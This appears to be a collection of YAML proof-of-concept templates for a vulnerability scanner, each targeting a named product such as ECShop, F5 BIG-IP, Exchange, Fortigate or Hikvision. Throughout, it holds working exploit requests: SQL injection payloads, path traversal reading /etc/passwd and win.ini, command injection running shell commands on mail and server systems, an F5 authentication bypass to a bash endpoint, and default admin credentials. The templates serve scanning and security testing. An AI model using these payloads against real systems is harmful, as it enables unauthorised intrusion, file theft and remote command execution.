1 | name: poc-yaml-ecshop-cnvd-2020-58823-sqli 2 | set: 3 | r1: randomInt(40000, 44800) 4 | rules: 5 | - method: POST 6 | path: /delete_cart_goods.php 7 | body: id=0||(updatexml(1,concat(0x7e,(select%20md5({{r1}})),0x7e),1)) 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 10 | detail: 11 | author: 凉风(http://webkiller.cn/) 12 | links: 13 | - https://mp.weixin.qq.com/s/1t0uglZNoZERMQpXVVjIPw -------------------------------------------------------------------------------- /src/plugins/pocs/ecshop-collection-list-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecshop-collection-list-sqli 2 | set: 3 | r1: randomInt(10000, 99999) 4 | rules: 5 | - method: GET 6 | path: /user.php?act=collection_list 7 | headers: 8 | X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953apay_log|s:55:"1' and updatexml(1,insert(md5({{r1}}),1,1,0x7e),1) and '";|45ea207d7a2b68c49582d2d22adf953a 9 | follow_redirects: false 10 | expression: response.body.bcontains(bytes(substr(md5(string(r1)), 1, 32))) 11 | detail: 12 | author: 曦shen 13 | links: 14 | - https://github.com/vulhub/vulhub/tree/master/ecshop/collection_list-sqli 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/ecshop-login-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecshop-login-sqli 2 | set: 3 | r1: randomInt(10000, 99999) 4 | rules: 5 | - method: GET 6 | path: /user.php?act=login 7 | headers: 8 | Content-Type: application/x-www-form-urlencoded 9 | Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:71:"0,1 procedure analyse(updatexml(1,insert(md5({{r1}}),1,1,0x7e),1),1)-- -";s:2:"id";i:1;} 10 | follow_redirects: false 11 | expression: response.body.bcontains(bytes(substr(md5(string(r1)), 1, 32))) 12 | detail: 13 | author: chalan630 14 | links: 15 | - https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/eea-info-leak-cnvd-2021-10543.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-eea-info-leak-cnvd-2021-10543 2 | rules: 3 | - method: GET 4 | path: "/authenticationserverservlet" 5 | expression: | 6 | response.status == 200 && "(.*?)".bmatches(response.body) && "(.*?)".bmatches(response.body) 7 | detail: 8 | author: Search?=Null 9 | description: "MessageSolution Enterprise Email Archiving (EEA) Info Leak." 10 | links: 11 | - https://exp1orer.github.io 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/elasticsearch-cve-2015-3337-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-elasticsearch-cve-2015-3337-lfi 2 | rules: 3 | - method: GET 4 | path: /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd 5 | expression: | 6 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 7 | 8 | detail: 9 | author: X.Yang 10 | links: 11 | - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-3337 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/elasticsearch-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-elasticsearch-unauth 2 | rules: 3 | - method: GET 4 | path: / 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"You Know, for Search") 8 | - method: GET 9 | path: /_cat 10 | follow_redirects: false 11 | expression: | 12 | response.status == 200 && response.body.bcontains(b"/_cat/master") 13 | detail: 14 | author: p0wd3r 15 | links: 16 | - https://yq.aliyun.com/articles/616757 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/etcd-v3-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-etcd-v3-unauth 2 | rules: 3 | - method: GET 4 | path: /version 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"etcdserver") 8 | 9 | detail: 10 | author: rj45(https://github.com/INT2ECALL) 11 | links: 12 | - https://networksec.blog.csdn.net/article/details/144912358?spm=1001.2014.3001.5502 -------------------------------------------------------------------------------- /src/plugins/pocs/etouch-v2-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-etouch-v2-sqli 2 | rules: 3 | - method: GET 4 | path: >- 5 | /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)' 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"c4ca4238a0b923820dcc509a6f75849b") 8 | detail: 9 | author: MaxSecurity(https://github.com/MaxSecurity) 10 | links: 11 | - https://github.com/mstxq17/CodeCheck/ 12 | - https://www.anquanke.com/post/id/168991 -------------------------------------------------------------------------------- /src/plugins/pocs/exchange-cve-2021-26855-ssrf.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-exchange-cve-2021-26855-ssrf 2 | rules: 3 | - method: GET 4 | path: /owa/auth/x.js 5 | headers: 6 | Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; 7 | follow_redirects: false 8 | expression: | 9 | response.headers["X-CalculatedBETarget"].icontains("localhost") 10 | detail: 11 | author: sharecast 12 | Affected Version: "Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010" 13 | links: 14 | - https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/eyou-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-eyou-email-system-rce 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: /webadm/?q=moni_detail.do&action=gragh 8 | headers: 9 | Content-Type: application/x-www-form-urlencoded 10 | body: | 11 | type='|expr%20{{r1}}%20%2B%20{{r2}}||' 12 | expression: | 13 | response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) 14 | detail: 15 | author: Print1n(http://print1n.top) 16 | description: 亿邮电子邮件系统 远程命令执行漏洞 17 | links: 18 | - https://fengchenzxc.github.io/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E4%BA%BF%E9%82%AE/%E4%BA%BF%E9%82%AE%E7%94%B5%E5%AD%90%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/ 19 | -------------------------------------------------------------------------------- /src/plugins/pocs/ezoffice-dpwnloadhttp.jsp-filedownload.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ezoffice-downloadhttp.jsp-filedownload 2 | rules: 3 | - method: GET 4 | path: /defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../public/edit/jsp/config.jsp 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.headers["filename"].contains("../public/edit/jsp/config.jsp") 8 | 9 | detail: 10 | author: PeiQi0 11 | links: 12 | - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E4%B8%87%E6%88%B7OA/%E4%B8%87%E6%88%B7OA%20downloadhttp.jsp%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.md 13 | tags: ezoffice,file,download 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/f5-cve-2021-22986.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-f5-cve-2021-22986 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: /mgmt/tm/util/bash 8 | headers: 9 | Content-Type: application/json 10 | Authorization: Basic YWRtaW46 11 | X-F5-Auth-Token: " " 12 | body: >- 13 | {"command":"run","utilCmdArgs":"-c 'expr {{r1}} + {{r2}}'"} 14 | follow_redirects: false 15 | expression: | 16 | response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) 17 | detail: 18 | author: Hex 19 | links: 20 | - https://support.f5.com/csp/article/K03009991 21 | -------------------------------------------------------------------------------- /src/plugins/pocs/f5-cve-2022-1388.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-f5-cve-2022-1388 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: /mgmt/tm/util/bash 8 | headers: 9 | Content-Type: application/json 10 | Connection: keep-alive, x-F5-Auth-Token 11 | X-F5-Auth-Token: a 12 | Authorization: Basic YWRtaW46 13 | body: >- 14 | {"command":"run","utilCmdArgs":"-c 'expr {{r1}} + {{r2}}'"} 15 | follow_redirects: false 16 | expression: | 17 | response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) 18 | detail: 19 | author: jindaxia 20 | links: 21 | - https://support.f5.com/csp/article/K23605346 22 | -------------------------------------------------------------------------------- /src/plugins/pocs/f5-tmui-cve-2020-5902-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-f5-tmui-cve-2020-5902-rce 2 | rules: 3 | - method: POST 4 | path: >- 5 | /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp 6 | headers: 7 | Content-Type: application/x-www-form-urlencoded 8 | body: fileName=%2Fetc%2Ff5-release 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 && response.body.bcontains(b"BIG-IP release") 12 | detail: 13 | author: Jing Ling 14 | links: 15 | - https://support.f5.com/csp/article/K52145254 16 | - https://github.com/rapid7/metasploit-framework/pull/13807/files 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/fangweicms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-fangweicms-sqli 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5({{rand}})%29%23 7 | expression: | 8 | response.body.bcontains(bytes(md5(string(rand)))) 9 | detail: 10 | author: Rexus 11 | Affected Version: "4.3" 12 | links: 13 | - http://www.wujunjie.net/index.php/2015/08/02/%E6%96%B9%E7%BB%B4%E5%9B%A2%E8%B4%AD4-3%E6%9C%80%E6%96%B0%E7%89%88sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/ 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/feifeicms-lfr.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-feifeicms-lfr 2 | rules: 3 | - method: GET 4 | path: /index.php?s=Admin-Data-down&id=../../Conf/config.php 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"") && response.body.bcontains(b"") 8 | detail: 9 | author: l1nk3r(http://www.lmxspace.com/) 10 | links: 11 | - http://foreversong.cn/archives/1378 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/finereport-v8-arbitrary-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-fineReport-v8.0-arbitrary-file-read 2 | rules: 3 | - method: GET 4 | path: /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"rootManagerName") && response.body.bcontains(b"CDATA") 8 | detail: 9 | author: Facker007(https://github.com/Facker007) 10 | links: 11 | - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%20v8.0%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CNVD-2018-04757.html?h=%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/flink-jobmanager-cve-2020-17519-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-flink-jobmanager-cve-2020-17519-lfi 2 | rules: 3 | - method: GET 4 | path: /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd 5 | expression: | 6 | response.status == 200 && "^root:[x*]:0:0:".bmatches(response.body) 7 | detail: 8 | author: MaxSecurity(https://github.com/MaxSecurity) 9 | links: 10 | - https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/fortigate-cve-2018-13379-readfile.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-fortigate-cve-2018-13379-readfile 2 | 3 | rules: 4 | - method: GET 5 | path: "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" 6 | headers: 7 | Content-Type: application/x-www-form-urlencoded 8 | follow_redirects: true 9 | expression: response.body.bcontains(bytes("fgt_lang")) && response.body.bcontains(bytes("Forticlient")) 10 | detail: 11 | author: tom0li(https://tom0li.github.io/) 12 | links: 13 | - https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/frp-dashboard-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-frp-dashboard-unauth 2 | groups: 3 | unauth: 4 | - method: GET 5 | path: /api/proxy/tcp 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && response.content_type.contains("text/plain") && response.body.bcontains(b"proxies") 9 | defaultpassword: 10 | - method: GET 11 | path: /api/proxy/tcp 12 | follow_redirects: false 13 | expression: | 14 | response.status == 401 && response.body.bcontains(b"Unauthorized") 15 | - method: GET 16 | path: /api/proxy/tcp 17 | headers: 18 | Authorization: Basic YWRtaW46YWRtaW4= 19 | follow_redirects: false 20 | expression: | 21 | response.status == 200 && response.content_type.contains("text/plain") && response.body.bcontains(b"proxies") 22 | -------------------------------------------------------------------------------- /src/plugins/pocs/gateone-cve-2020-35736.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-gateone-cve-2020-35736 2 | rules: 3 | - method: GET 4 | follow_redirects: true 5 | path: "/" 6 | expression: response.status == 200 && response.body.bcontains(b"GateOne.init") && response.body.bcontains(b"href=\"/static/gateone.css\"") 7 | - method: GET 8 | follow_redirects: false 9 | path: "/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" 10 | expression: | 11 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 12 | detail: 13 | author: tangshoupu 14 | links: 15 | - https://nvd.nist.gov/vuln/detail/CVE-2020-35736 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/gilacms-cve-2020-5515.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-gilacms-cve-2020-5515 2 | set: 3 | r1: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /admin/sql?query=SELECT%20md5({{r1}}) 7 | expression: | 8 | response.body.bcontains(bytes(md5(string(r1)))) 9 | detail: 10 | author: PickledFish(https://github.com/PickledFish) 11 | links: 12 | - https://infosecdb.wordpress.com/2020/01/05/gilacms-1-11-8-admin-sqlquery-sql-injection/ 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/gitlab-ssrf-cve-2021-22214.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-gitlab-ssrf-cve-2021-22214 2 | rules: 3 | - method: POST 4 | path: /api/v4/ci/lint 5 | headers: 6 | Content-Type: application/json 7 | body: | 8 | {"include_merged_yaml": true, "content": "include:\n remote: http://baidu.com/api/v1/targets/?test.yml"} 9 | expression: | 10 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"{\"status\":\"invalid\",\"errors\":") && (response.body.bcontains(b"does not have valid YAML syntax") || response.body.bcontains(b"could not be fetched")) 11 | detail: 12 | author: mumu0215(https://github.com/mumu0215) 13 | links: 14 | - https://mp.weixin.qq.com/s/HFug1khyfHmCujhc_Gm_yQ 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/glassfish-cve-2017-1000028-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-glassfish-cve-2017-1000028-lfi 2 | rules: 3 | - method: GET 4 | path: /theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF 5 | follow_redirects: true 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"Ant-Version:") && response.body.bcontains(b"Manifest-Version:") 8 | detail: 9 | version: <4.1.0 10 | author: sharecast 11 | links: 12 | - https://github.com/vulhub/vulhub/tree/master/glassfish/4.1.0 -------------------------------------------------------------------------------- /src/plugins/pocs/go-pprof-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-go-pprof-leak 2 | rules: 3 | - method: GET 4 | path: "/debug/pprof/" 5 | expression: | 6 | response.status == 200 && response.body.bcontains(bytes(string(b"Types of profiles available"))) && response.body.bcontains(bytes(string(b"Profile Descriptions"))) 7 | - method: GET 8 | path: "/debug/pprof/goroutine?debug=1" 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(string(b"goroutine profile: total"))) 11 | detail: 12 | author: pa55w0rd(www.pa55w0rd.online/) 13 | Affected Version: "go pprof leak" 14 | links: 15 | - https://cloud.tencent.com/developer/news/312276 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/gocd-cve-2021-43287.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-gocd-cve-2021-43287 2 | groups: 3 | linux0: 4 | - method: GET 5 | path: /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../../../etc/passwd 6 | follow_redirects: false 7 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 8 | windows0: 9 | - method: GET 10 | path: /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../../../windows/win.ini 11 | follow_redirects: false 12 | expression: response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]")) 13 | detail: 14 | author: For3stCo1d (https://github.com/For3stCo1d) 15 | description: "Gocd-file-read" 16 | links: 17 | - https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover 18 | -------------------------------------------------------------------------------- /src/plugins/pocs/h2-database-web-console-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-h2-database-web-console-unauthorized-access 2 | rules: 3 | - method: GET 4 | path: /h2-console 5 | follow_redirects: true 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"Welcome to H2") 8 | search: | 9 | location.href = '(?P.+?)' 10 | - method: GET 11 | path: /h2-console/{{token}} 12 | expression: | 13 | response.status == 200 && response.body.bcontains(b"Generic H2") 14 | detail: 15 | author: jujumanman (https://github.com/jujumanman) 16 | links: 17 | - https://blog.csdn.net/zy15667076526/article/details/111413979 18 | - https://github.com/vulhub/vulhub/tree/master/h2database/h2-console-unacc 19 | -------------------------------------------------------------------------------- /src/plugins/pocs/h3c-secparh-any-user-login.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-h3c-secparh-any-user-login 2 | rules: 3 | - method: GET 4 | path: /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin 5 | expression: | 6 | response.status == 200 && "错误的id".bmatches(response.body) && "审计管理员".bmatches(response.body) && "admin".bmatches(response.body) 7 | detail: 8 | author: Print1n(https://print1n.top) 9 | links: 10 | - https://www.pwnwiki.org/index.php?title=H3C_SecParh%E5%A0%A1%E5%A3%98%E6%A9%9F_get_detail_view.php_%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6%E7%99%BB%E9%8C%84%E6%BC%8F%E6%B4%9E 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/h5s-video-platform-cnvd-2020-67113-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-h5s-video-platform-cnvd-2020-67113-unauth 2 | groups: 3 | h5s1: 4 | - method: GET 5 | path: /api/v1/GetSrc 6 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"H5_AUTO") && response.body.bcontains(b"strUser") && response.body.bcontains(b"strPasswd") 7 | h5s2: 8 | - method: GET 9 | path: /api/v1/GetDevice 10 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"H5_DEV") && response.body.bcontains(b"strUser") && response.body.bcontains(b"strPasswd") 11 | expression: h5s1() || h5s2() 12 | detail: 13 | author: iak3ec(https://github.com/nu0l) 14 | payload: /#/Dashboard | /#/Settings/Camera 15 | links: 16 | - https://www.cnvd.org.cn/flaw/show/CNVD-2020-67113 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/hadoop-yarn-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-hadoop-yarn-unauth 2 | rules: 3 | - method: GET 4 | path: /ws/v1/cluster/info 5 | follow_redirects: true 6 | headers: 7 | Content-Type: application/json 8 | expression: | 9 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"resourceManagerVersionBuiltOn") && response.body.bcontains(b"hadoopVersion") 10 | detail: 11 | author: p0wd3r,sharecast 12 | links: 13 | - https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/hanming-video-conferencing-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-hanming-video-conferencing-file-read 2 | groups: 3 | windows: 4 | - method: GET 5 | path: /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini 6 | follow_redirects: false 7 | expression: | 8 | response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]")) 9 | 10 | linux: 11 | - method: GET 12 | path: /register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd 13 | follow_redirects: false 14 | expression: | 15 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 16 | 17 | detail: 18 | author: kzaopa(https://github.com/kzaopa) 19 | links: 20 | - https://mp.weixin.qq.com/s/F-M21PT0xn9QOuwoC8llKA -------------------------------------------------------------------------------- /src/plugins/pocs/hikvision-cve-2017-7921.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-hikvision-cve-2017-7921 2 | rules: 3 | - method: GET 4 | path: /system/deviceInfo?auth=YWRtaW46MTEK 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.headers["content-type"] == "application/xml" && response.body.bcontains(b"") 8 | detail: 9 | author: whwlsfb(https://github.com/whwlsfb) 10 | links: 11 | - https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/hikvision-gateway-data-file-read.yml: -------------------------------------------------------------------------------- 1 | name: hikvision-gateway-data-file-read 2 | rules: 3 | - method: GET 4 | path: /data/login.php::$DATA 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b'DataBaseQuery();') && response.body.bcontains(b'$_POST[\'userName\'];') && response.body.bcontains(b'$_POST[\'password\'];') 7 | info: 8 | author: zan8in 9 | description: | 10 | HIKVISION 视频编码设备接入网关 $DATA 任意文件读取 11 | HIKVISION 视频编码设备接入网关存在配置错误特性,特殊后缀请求php文件可读取源码 12 | title="视频编码设备接入网关" 13 | links: 14 | - http://wiki.peiqi.tech/wiki/iot/HIKVISION/HIKVISION%20%E8%A7%86%E9%A2%91%E7%BC%96%E7%A0%81%E8%AE%BE%E5%A4%87%E6%8E%A5%E5%85%A5%E7%BD%91%E5%85%B3%20$DATA%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96.html 15 | 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/hikvision-info-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-hikvision-info-leak 2 | rules: 3 | - method: GET 4 | path: / 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"流媒体管理服务器") && response.body.bcontains(b"海康威视") 8 | - method: GET 9 | path: /config/user.xml 10 | follow_redirects: false 11 | expression: | 12 | response.status == 200 && response.body.bcontains(b"- 5 | /index.htm?PAGE=web 6 | follow_redirects: false 7 | expression: > 8 | response.status == 200 && response.body.bcontains(b"www.ifw8.cn") 9 | - method: GET 10 | path: >- 11 | /action/usermanager.htm 12 | follow_redirects: false 13 | expression: > 14 | response.status == 200 && "\"pwd\":\"[0-9a-z]{32}\"".bmatches(response.body) 15 | detail: 16 | author: cc_ci(https://github.com/cc8ci) 17 | Affected Version: "v4.31" 18 | links: 19 | - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16313 20 | - http://www.iwantacve.cn/index.php/archives/311/ 21 | - https://nvd.nist.gov/vuln/detail/CVE-2019-16312 -------------------------------------------------------------------------------- /src/plugins/pocs/iis-put-getshell.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-iis-put-getshell 2 | set: 3 | filename: randomLowercase(6) 4 | fileContent: randomLowercase(6) 5 | 6 | rules: 7 | - method: PUT 8 | path: /{{filename}}.txt 9 | body: | 10 | {{fileContent}} 11 | expression: | 12 | response.status == 201 13 | - method: GET 14 | path: /{{filename}}.txt 15 | follow_redirects: false 16 | expression: | 17 | response.status == 200 && response.body.bcontains(bytes(fileContent)) 18 | 19 | detail: 20 | author: Cannae(github.com/thunderbarca) 21 | links: 22 | - https://www.cnblogs.com/-mo-/p/11295400.html 23 | -------------------------------------------------------------------------------- /src/plugins/pocs/influxdb-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-influxdb-unauth 2 | rules: 3 | - method: GET 4 | path: /ping 5 | follow_redirects: true 6 | expression: | 7 | response.status == 204 && "x-influxdb-version" in response.headers 8 | - method: GET 9 | path: /query?q=show%20users 10 | follow_redirects: true 11 | expression: > 12 | response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"columns") && response.body.bcontains(b"user") 13 | detail: 14 | author: p0wd3r 15 | links: 16 | - https://docs.influxdata.com/influxdb/v1.7/tools/api/ -------------------------------------------------------------------------------- /src/plugins/pocs/inspur-tscev4-cve-2020-21224-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-inspur-tscev4-cve-2020-21224-rce 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: /login 8 | body: op=login&username=1 2\',\'1\'\);`expr%20{{r1}}%20%2b%20{{r2}}` 9 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(bytes(string(r1 + r2))) 10 | detail: 11 | author: jingling(https://github.com/shmilylty) 12 | links: 13 | - https://github.com/NS-Sp4ce/Inspur 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/jboss-cve-2010-1871.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jboss-cve-2010-1871 2 | set: 3 | r1: randomInt(8000000, 10000000) 4 | r2: randomInt(8000000, 10000000) 5 | rules: 6 | - method: GET 7 | path: /admin-console/index.seam?actionOutcome=/pwn.xhtml%3fpwned%3d%23%7b{{r1}}*{{r2}}%7d 8 | follow_redirects: false 9 | expression: | 10 | response.status == 302 && response.headers["location"].contains(string(r1 * r2)) 11 | detail: 12 | author: fuping 13 | links: 14 | - http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html 15 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1871 -------------------------------------------------------------------------------- /src/plugins/pocs/jboss-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jboss-unauth 2 | rules: 3 | - method: GET 4 | path: /jmx-console/ 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"jboss.management.local") && response.body.bcontains(b"jboss.web") 8 | detail: 9 | author: FiveAourThe(https://github.com/FiveAourThe) 10 | links: 11 | - https://xz.aliyun.com/t/6103 -------------------------------------------------------------------------------- /src/plugins/pocs/jeewms-showordownbyurl-fileread.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jeewms-showordownbyurl-fileread 2 | groups: 3 | linux: 4 | - method: GET 5 | path: /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd 6 | expression: | 7 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 8 | windows: 9 | - method: GET 10 | path: /systemController/showOrDownByurl.do?down=&dbPath=../../../../../Windows/win.ini 11 | expression: | 12 | response.status == 200 && response.body.bcontains(b"for 16-bit app support") 13 | detail: 14 | author: B1anda0(https://github.com/B1anda0) 15 | links: 16 | - https://mp.weixin.qq.com/s/ylOuWc8elD2EtM-1LiJp9g 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/jellyfin-file-read-cve-2021-21402.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jellyfin-file-read-cve-2021-21402 2 | rules: 3 | - method: GET 4 | path: "/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/" 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"for 16-bit app support") 7 | detail: 8 | author: Print1n(https://github.com/Print1n) 9 | links: 10 | - https://blog.csdn.net/qq_41503511/article/details/116274406 11 | -------------------------------------------------------------------------------- 